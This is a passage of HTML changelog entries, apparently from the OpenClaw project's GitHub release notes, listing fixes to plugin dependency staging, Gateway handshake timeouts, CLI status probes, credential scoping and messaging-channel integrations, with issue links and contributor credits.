<li>Plugins/runtime-deps: cache unchanged bundled runtime mirror dist-file materialization decisions and close file-lock handles on owner-write failures, reducing repeated startup chunk scans and avoiding FileHandle-GC recovery stalls. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342776048" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73532" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73532/hovercard" href="https://github.com/openclaw/openclaw/issues/73532">#73532</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oadiazp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oadiazp">@oadiazp</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bstanbury/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bstanbury">@bstanbury</a>.</li>
<li>Plugins/runtime-deps: retry and defer transient cleanup failures for owned runtime staging directories so CLI startup no longer aborts after a successful bundled dependency swap. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347196394" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73903" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73903/hovercard" href="https://github.com/openclaw/openclaw/issues/73903">#73903</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bobfreeman1989/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bobfreeman1989">@bobfreeman1989</a>.</li>
<li>Plugins/runtime-deps: cache bundled runtime-deps JSON/package files by file signature, reducing repeated staged-runtime metadata reads during bundled channel startup. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344394559" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73647" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73647/hovercard" href="https://github.com/openclaw/openclaw/issues/73647">#73647</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345057984" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73705" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73705/hovercard" href="https://github.com/openclaw/openclaw/issues/73705">#73705</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mattmcintyre/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mattmcintyre">@mattmcintyre</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bmilne1981/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bmilne1981">@bmilne1981</a>.</li>
<li>Plugins/runtime-deps: delegate bundled plugin dependency staging to complete npm/pnpm install plans with durable runtime state, removing retained-manifest and source-checkout cache reconciliation from Gateway startup. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342776048" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73532" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73532/hovercard" href="https://github.com/openclaw/openclaw/issues/73532">#73532</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oadiazp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oadiazp">@oadiazp</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bstanbury/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bstanbury">@bstanbury</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jmfraga/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jmfraga">@jmfraga</a>.</li>
<li>Plugins/runtime-deps: replace Gateway-start root chunk dependency inference with explicit mirrored-root dependency metadata, reducing staged runtime scans while preserving lazy per-plugin installs. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342776048" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73532" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73532/hovercard" href="https://github.com/openclaw/openclaw/issues/73532">#73532</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oadiazp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oadiazp">@oadiazp</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bstanbury/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bstanbury">@bstanbury</a>.</li>
<li>Plugins/runtime-deps: run pnpm staged installs outside the repository workspace and disable pnpm release-age gates for exact bundled runtime dependency materialization, so bundled plugin dependency repair writes packages into the generated stage without blocking fresh packaged dependencies. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342776048" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73532" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73532/hovercard" href="https://github.com/openclaw/openclaw/issues/73532">#73532</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oadiazp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oadiazp">@oadiazp</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bstanbury/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bstanbury">@bstanbury</a>.</li>
<li>CLI/TUI: keep <code>chat.history</code> off model-catalog discovery so initial Gateway-backed TUI history loads cannot block behind slow provider/plugin model scans on low-core hosts. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342748182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73524" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73524/hovercard" href="https://github.com/openclaw/openclaw/issues/73524">#73524</a>. Thanks @harshcatsystems-collab.</li>
<li>Channels/WhatsApp: flag recently reconnected linked accounts in channel status even when the socket is currently healthy, so flapping WhatsApp Web sessions no longer look clean after a brief reconnect. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343892445" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73602" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73602/hovercard" href="https://github.com/openclaw/openclaw/issues/73602">#73602</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Vksh07/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Vksh07">@Vksh07</a>.</li>
<li>Channels/WhatsApp: log shared dispatcher delivery failures with reply kind, message id, chat id, and connection id, so typing-without-send reports can identify whether the WhatsApp send path rejected a generated reply. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349593113" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74269" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74269/hovercard" href="https://github.com/openclaw/openclaw/issues/74269">#74269</a>. Thanks @tomcosta-git.</li>
<li>Feishu: suppress distinct late <code>final</code> text deliveries after a streaming card has already closed, while keeping media attachments deliverable, so late-finals no longer reopen duplicate Feishu cards. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330083943" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71977" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71977/hovercard" href="https://github.com/openclaw/openclaw/issues/71977">#71977</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331519751" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72294" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72294/hovercard" href="https://github.com/openclaw/openclaw/pull/72294">#72294</a>) Thanks @MonkeyLeeT.</li>
<li>Gateway: expose <code>gateway.handshakeTimeoutMs</code> in config, schema, and docs while preserving <code>OPENCLAW_HANDSHAKE_TIMEOUT_MS</code> precedence, so loaded or low-powered hosts can tune local WebSocket pre-auth handshakes without patching dist files. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4110188380" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51282" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/51282/hovercard" href="https://github.com/openclaw/openclaw/pull/51282">#51282</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343737030" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73592" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73592/hovercard" href="https://github.com/openclaw/openclaw/issues/73592">#73592</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344421059" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73652" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73652/hovercard" href="https://github.com/openclaw/openclaw/issues/73652">#73652</a>. Thanks @henry-the-frog.</li>
<li>Gateway/TUI/status: align configured and env-based WebSocket handshake budgets across local clients, probes, and fallback RPCs while preserving explicit status timeouts and paired-device auth fallback, so slow local gateways are not marked unreachable by a shorter client watchdog. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342748182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73524" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73524/hovercard" href="https://github.com/openclaw/openclaw/issues/73524">#73524</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342797952" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73535" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73535/hovercard" href="https://github.com/openclaw/openclaw/issues/73535">#73535</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343737030" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73592" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73592/hovercard" href="https://github.com/openclaw/openclaw/issues/73592">#73592</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343892445" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73602" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73602/hovercard" href="https://github.com/openclaw/openclaw/issues/73602">#73602</a>. Thanks @harshcatsystems-collab, @DJBlackhawk, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Vksh07/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Vksh07">@Vksh07</a>.</li>
<li>Gateway/startup: return retryable <code>UNAVAILABLE</code> during the sidecar startup window and keep CLI/TUI/status clients retrying inside their existing timeout budget, so early connects no longer surface as terminal handshake failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344421059" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73652" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73652/hovercard" href="https://github.com/openclaw/openclaw/issues/73652">#73652</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/spenceryang1996-dot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/spenceryang1996-dot">@spenceryang1996-dot</a>.</li>
<li>Gateway/proxy: bypass inherited proxy environment for local Gateway control-plane WebSockets to <code>localhost</code> as well as loopback IPs, so Windows/WSL proxy settings cannot intercept local CLI/TUI Gateway connections. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342188777" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73474" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73474/hovercard" href="https://github.com/openclaw/openclaw/pull/73474">#73474</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343892445" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73602" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73602/hovercard" href="https://github.com/openclaw/openclaw/issues/73602">#73602</a>. Thanks @DhtIsCoding.</li>
<li>Doctor/Gateway: use a lightweight <code>status</code> RPC without channel summary work for doctor Gateway liveness, so slow health snapshots do not falsely drive service restart repair. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4240455463" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64400" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64400/hovercard" href="https://github.com/openclaw/openclaw/issues/64400">#64400</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4241956746" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64511" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64511/hovercard" href="https://github.com/openclaw/openclaw/pull/64511">#64511</a>. Thanks @CHE10X and @EronFan.</li>
<li>Agents/auth: scope external CLI credential discovery to configured providers during model auth status and startup prewarm, so opencode-only and other single-provider gateways do not block on unrelated Claude CLI Keychain probes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347237976" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73908" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73908/hovercard" href="https://github.com/openclaw/openclaw/issues/73908">#73908</a>. Thanks @Ailuras.</li>
<li>Agents/model selection: resolve slash-form aliases before provider/model parsing and keep alias-resolved primary models subject to transient provider cooldowns, so cron and persisted sessions do not retry cooled-down raw aliases. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343366616" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73573" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73573/hovercard" href="https://github.com/openclaw/openclaw/issues/73573">#73573</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344524821" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73657" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73657/hovercard" href="https://github.com/openclaw/openclaw/issues/73657">#73657</a>. Thanks @akai-shuuichi and @hashslingers.</li>
<li>Agents/Claude CLI: reuse already-cached macOS Keychain credentials for no-prompt Claude credential reads, so doctor/runtime checks do not miss fresh interactive Claude auth. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344788745" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73682" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73682/hovercard" href="https://github.com/openclaw/openclaw/issues/73682">#73682</a>. Thanks @RyanSandoval.</li>
<li>Agents/Claude CLI doctor: scope workspace and project-dir checks to agents that actually use the Claude CLI runtime, so non-default Claude agents no longer make the default agent look Claude-backed. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347196394" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73903" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73903/hovercard" href="https://github.com/openclaw/openclaw/issues/73903">#73903</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bobfreeman1989/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bobfreeman1989">@bobfreeman1989</a>.</li>
<li>Gateway/sessions: expose effective agent runtime metadata on session rows, <code>sessions.patch</code>, and local <code>openclaw sessions --json</code>, while keeping Claude CLI-backed rows on the canonical model provider so runtime backend and model identity are no longer conflated. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339520660" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73090" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73090/hovercard" href="https://github.com/openclaw/openclaw/issues/73090">#73090</a>. Thanks @vishutdhar.</li>
<li>Gateway/auth status: scope external CLI credential overlays to configured providers, runtimes, or profiles and keep status reads off new Keychain prompts, so single-provider Gateway configs no longer probe unrelated Claude/Codex/MiniMax auth on startup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347237976" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73908" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73908/hovercard" href="https://github.com/openclaw/openclaw/issues/73908">#73908</a>. Thanks @Ailuras.</li>
<li>Agents/runtime status: expose effective agent runtime metadata in <code>agents.list</code>, Control UI agent panels, and <code>/agents</code>, and avoid rendering stale or cumulative CLI token totals as live context usage. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344570308" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73660" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73660/hovercard" href="https://github.com/openclaw/openclaw/issues/73660">#73660</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343419061" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73578" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73578/hovercard" href="https://github.com/openclaw/openclaw/issues/73578">#73578</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4072029751" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45268" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/45268/hovercard" href="https://github.com/openclaw/openclaw/issues/45268">#45268</a>. Thanks @spartman, @DashLabsDev, and @xyooz.</li>
<li>Agents/transcripts: strip empty assistant text blocks while preserving valid text, images, and signatures, so Anthropic-style providers no longer reject sanitized transcript turns. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344345617" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73640" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73640/hovercard" href="https://github.com/openclaw/openclaw/issues/73640">#73640</a>. Thanks @jowhee327.</li>
<li>Gateway/sessions: preserve session keys on hidden lifecycle events so channel-routed runs still persist terminal session state and do not strand session status as running after Codex turn completion. Thanks @cathrynlavery.</li>
<li>Providers/Bedrock: omit deprecated <code>temperature</code> for Claude Opus 4.7 Bedrock model ids, named and application inference profiles, including dotted <code>opus-4.7</code> refs, and classify the nested validation response for failover. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344649937" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73663" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73663/hovercard" href="https://github.com/openclaw/openclaw/issues/73663">#73663</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bstanbury/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bstanbury">@bstanbury</a>.</li>
<li>Gateway: raise the preauth/connect-challenge timeout to 15s so cold CLI starts on slower hosts have more time to process the WebSocket challenge before the Gateway closes the connection. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4111642035" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51469" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51469/hovercard" href="https://github.com/openclaw/openclaw/issues/51469">#51469</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343737030" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73592" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73592/hovercard" href="https://github.com/openclaw/openclaw/issues/73592">#73592</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4213272898" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62060" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62060/hovercard" href="https://github.com/openclaw/openclaw/pull/62060">#62060</a>. Thanks @GothicFox and @jackychen-png.</li>
<li>CLI/status: fall back to a bounded local <code>status</code> RPC when loopback detail probes time out or report unknown capability, so reachable local gateways are no longer marked unreachable by slow read diagnostics. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342797952" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73535" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73535/hovercard" href="https://github.com/openclaw/openclaw/issues/73535">#73535</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4083597939" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48360" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48360/hovercard" href="https://github.com/openclaw/openclaw/issues/48360">#48360</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4221198235" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62762" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62762/hovercard" href="https://github.com/openclaw/openclaw/issues/62762">#62762</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4110811160" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51357" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51357/hovercard" href="https://github.com/openclaw/openclaw/issues/51357">#51357</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4050661491" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42019" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42019/hovercard" href="https://github.com/openclaw/openclaw/issues/42019">#42019</a>. Thanks @RacecarGuy, @justinschille, @DJBlackhawk, @tianyaqpzm, and @0xrsydn.</li>
<li>CLI/gateway: reuse cached paired-device auth during <code>gateway probe</code> and report post-connect diagnostic failures as degraded reachability, so healthy local gateways are no longer marked unreachable after loopback auth or read timeouts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4083597939" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48360" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48360/hovercard" href="https://github.com/openclaw/openclaw/issues/48360">#48360</a>. Thanks @RacecarGuy.</li>
<li>Channels/Discord: give Discord Gateway WebSocket handshakes a 30s timeout so stalled TLS/network transitions emit an error and Carbon can continue its reconnect loop instead of leaving the bot silent until restart. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4097993139" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50046" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/50046/hovercard" href="https://github.com/openclaw/openclaw/pull/50046">#50046</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codexGW/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codexGW">@codexGW</a>.</li>
<li>Mattermost/WebSocket: send protocol ping/pong keepalives and terminate stale sessions when pongs stop arriving, so silent TCP drops reconnect instead of leaving monitoring idle. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4049689741" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41837" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/41837/hovercard" href="https://github.com/openclaw/openclaw/issues/41837">#41837</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4169293678" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/57621" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/57621/hovercard" href="https://github.com/openclaw/openclaw/pull/57621">#57621</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4098800956" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50138" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/50138/hovercard" href="https://github.com/openclaw/openclaw/issues/50138">#50138</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4065388815" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44160" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44160/hovercard" href="https://github.com/openclaw/openclaw/issues/44160">#44160</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4108428334" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51104" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51104/hovercard" href="https://github.com/openclaw/openclaw/issues/51104">#51104</a>. Thanks @JasonWang1124.</li>
<li>Channels/Telegram: suppress standalone failed edit/write warning payloads when a user-facing assistant error reply already covers the turn, while keeping unresolved mutating failures visible behind success-looking or suppressed-error replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4040841536" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39631" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/39631/hovercard" href="https://github.com/openclaw/openclaw/issues/39631">#39631</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345454858" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73750" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73750/hovercard" href="https://github.com/openclaw/openclaw/pull/73750">#73750</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4040858007" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39636" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/39636/hovercard" href="https://github.com/openclaw/openclaw/pull/39636">#39636</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041006323" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39717" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/39717/hovercard" href="https://github.com/openclaw/openclaw/pull/39717">#39717</a>; leaves <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4040278873" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39406" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/39406/hovercard" href="https://github.com/openclaw/openclaw/issues/39406">#39406</a> for configurable delivery policy. Thanks @Bartok9 and @Bortlesboat.</li>
<li>Control UI/agents: persist the Set Default action through <code>agents.list[].default</code> instead of writing the unsupported <code>agents.defaultId</code> field, so saved default-agent changes survive config validation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4250028068" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65565" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65565/hovercard" href="https://github.com/openclaw/openclaw/issues/65565">#65565</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333057256" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72585" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72585/hovercard" href="https://github.com/openclaw/openclaw/pull/72585">#72585</a>. Thanks @luyao618.</li>
<li>NVIDIA/NIM: persist the <code>NVIDIA_API_KEY</code> provider marker and mark bundled NVIDIA Chat Completions models as string-content compatible, so NIM models load from <code>models.json</code> and OpenAI-compatible subagent calls send plain text content. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338530888" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73013" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73013/hovercard" href="https://github.com/openclaw/openclaw/issues/73013">#73013</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4098604940" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50107" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/50107/hovercard" href="https://github.com/openclaw/openclaw/issues/50107">#50107</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338532925" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73014" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73014/hovercard" href="https://github.com/openclaw/openclaw/issues/73014">#73014</a>. Thanks @bautrey, @iot2edge, @ifearghal, and @futhgar.</li>
<li>Channels/Discord: let text-only configs drop the <code>GuildVoiceStates</code> gateway intent and expose a bounded <code>/gateway/bot</code> metadata timeout with rate-limited fallback logs, reducing idle CPU and warning floods. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345114420" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73709" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73709/hovercard" href="https://github.com/openclaw/openclaw/issues/73709">#73709</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343589386" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73585" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73585/hovercard" href="https://github.com/openclaw/openclaw/issues/73585">#73585</a>. Thanks @sanchezm86 and @trac3r00.</li>
